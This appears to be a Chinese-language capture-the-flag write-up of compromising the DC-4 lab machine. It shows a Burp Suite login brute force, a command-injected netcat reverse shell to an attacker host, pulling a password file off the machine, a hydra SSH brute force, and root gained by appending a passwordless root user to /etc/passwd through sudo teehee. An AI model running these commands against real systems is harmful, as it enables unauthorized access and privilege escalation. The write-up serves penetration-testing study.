DC-4 靶机

DC_4

信息搜集

存活检测

详细扫描

DC-4 靶机_第1张图片

后台网页扫描

DC-4 靶机_第2张图片

网页信息搜集

DC-4 靶机_第3张图片

只有一个登陆界面

漏洞利用

  • 尝试使用 burpsuite 密码爆破

    尝试使用用户名 admin 登录管理员页面

  • 成功爆破出密码 happy

    DC-4 靶机_第4张图片

  • 登录管理员页面

    显示可以使用命令

    DC-4 靶机_第5张图片

  • 但只能使用三个命令

    DC-4 靶机_第6张图片

  • 继续使用 bp 拦截查看数据包

    发送到 Repeater 中进行调试

    DC-4 靶机_第7张图片

  • 可以观察到列出当前文件的指令铭文显示在 POST 传参中

    查看命令本应为 ls -l 而参数中的命令为 ls+-1,猜测此处应该使用 + 代替了空格

  • 尝试将命令修改为连接反弹 shell 的 命令

  • kali 开启 nc 监听

    nc -lvvp 7777
    
  • 将抓取的命令修改为

    nc+-e+/bin/bash+10.4.7.146+7777
    

    DC-4 靶机_第8张图片

  • 成功反弹

    DC-4 靶机_第9张图片

ssh 密码爆破

  • 搜集有用信息

    在/home/jim/backups 目录下发现了旧密码文件

    DC-4 靶机_第10张图片

  • 将密码文件保存

  • 靶机开启 http 上传

    python3 -m http.server 8888
    

    image-20231022211612326

  • kali 下载旧密码文件

    wget http://10.4.7.148:8888/old-passwords.bak
    

    DC-4 靶机_第11张图片

  • hydra 密码爆破

    hydra -l jim -P old-passwords.bak ssh://10.4.7.148 -vV -f -I
    
  • 成功爆破出 jim 的密码 jibril04

  • 登录

    ssh [email protected]
    

    DC-4 靶机_第12张图片

提权

  • 尝试 sudo -l

    无 root 权限

    DC-4 靶机_第13张图片

  • 返回查看到登陆后收到了一封邮件

    DC-4 靶机_第14张图片

  • 查看邮箱

    DC-4 靶机_第15张图片

  • 邮箱是 Charles 发来的,并告知了他的密码 ^xHhA&hvim0y

  • 切换用户

  • 成功切换,sudo -l 查看权限

    DC-4 靶机_第16张图片

  • 可以使用 teehee 命令

  • 查看 teehee 命令的使用方式

    teehee --help
    

    DC-4 靶机_第17张图片

  • 帮助中显示使用 teehee -a <文件> 可以向文件中追加内容

  • 尝试向 /etc/passwd 文件中追加一条 root 用户

    sudo /usr/bin/teehee -a /etc/passwd 
    
    nb::0:0:root:/root:/bin/bash
    

    DC-4 靶机_第18张图片

  • 切换创建的用户

    su nb
    

    image-20231022214009533

    成功获取 root 权限

总结

  • burpsuite 网页登录爆破
  • burpsuite 拦截修改数据包
  • hydra 爆破 ssh 密码
  • sudo 提权
  • 向 /etc/passwd 文件添加 root 用户

你可能感兴趣的:(渗透测试,服务器,运维,网络,web安全,网络安全)